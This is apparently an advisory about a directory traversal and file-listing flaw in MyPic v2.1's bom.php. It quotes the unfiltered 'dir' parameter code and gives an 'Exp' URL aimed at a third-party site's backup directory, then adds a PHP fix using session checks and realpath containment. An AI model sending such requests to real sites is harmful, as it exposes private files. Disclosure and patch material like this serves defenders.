MyPic v2.1 File Traversal Vulnerability

Author: hack1990  Date: 13-03-14  Views: 747


Official site: http://www.diqiye.com/mypic/

Vulnerability description:
/bom.php (the file has no access restrictions of any kind)
  
Code:
if (isset($_GET['dir'])){ //config the basedir
     $basedir=$_GET['dir']; // not filtered, so any directory can be supplied
}else{
     $basedir = '.';
}

$auto = 1;

checkdir($basedir);

// Recursively walk $basedir and print every file with its checkBOM() result
function checkdir($basedir){
     if ($dh = opendir($basedir)) {
         while (($file = readdir($dh)) !== false) {
             if ($file != '.' && $file != '..'){
                 if (!is_dir($basedir."/".$file)) {
                     echo "filename: $basedir/$file ".checkBOM("$basedir/$file")." <br>";
                 }else{
                     $dirname = $basedir."/".$file;
                     checkdir($dirname);
                 }
             }
         }
         closedir($dh);
     }
}
......
function rewrite ($filename, $data) {
     $filenum = fopen($filename, "w");
     flock($filenum, LOCK_EX);
     fwrite($filenum, $data);
     fclose($filenum);
}

Exp : http://www.iick.blog/mypic1/bom.php?dir=./data/bak/
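
One way to close the hole shown above, as an added example that is not MyPic's own code: require an authenticated session before the script does anything, and canonicalize the requested directory with realpath() so that it cannot leave an allowed base. The function name resolve_scan_dir, the is_admin session flag and the upload base directory are assumptions made for illustration.

```php
<?php
// Added example, not MyPic's code. ALLOWED_BASE and the is_admin
// session flag are assumptions; map them to the real application.
session_start();
define('ALLOWED_BASE', __DIR__ . '/upload'); // hypothetical scan root

// Return the canonical directory to scan, or null if the request
// is malformed, does not exist, or resolves outside ALLOWED_BASE.
function resolve_scan_dir($requested): ?string
{
    $base = realpath(ALLOWED_BASE);
    if ($base === false) {
        return null;              // base missing: fail closed
    }
    if ($requested === null) {
        return $base;             // no ?dir= given: scan the base only
    }
    // Reject arrays (?dir[]=x) and embedded NUL bytes up front.
    if (!is_string($requested) || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses "." and ".." and follows symlinks; it
    // returns false when the path does not exist.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_dir($real)) {
        return null;
    }
    // Prefix check with a trailing separator, so that a sibling such
    // as "/upload_old" is not accepted as a child of "/upload".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real !== $base && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// 1. Access restriction, which bom.php lacked entirely.
if (empty($_SESSION['is_admin'])) {
    http_response_code(403);
    exit('Forbidden');
}

// 2. Containment check before anything reaches opendir().
$basedir = resolve_scan_dir($_GET['dir'] ?? null);
if ($basedir === null) {
    http_response_code(400);
    exit('Invalid directory');
}
// $basedir is now a canonical path inside ALLOWED_BASE.
```

With both checks in place, an unauthenticated request of the form shown in the Exp line is answered with 403 before any directory is opened.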
 
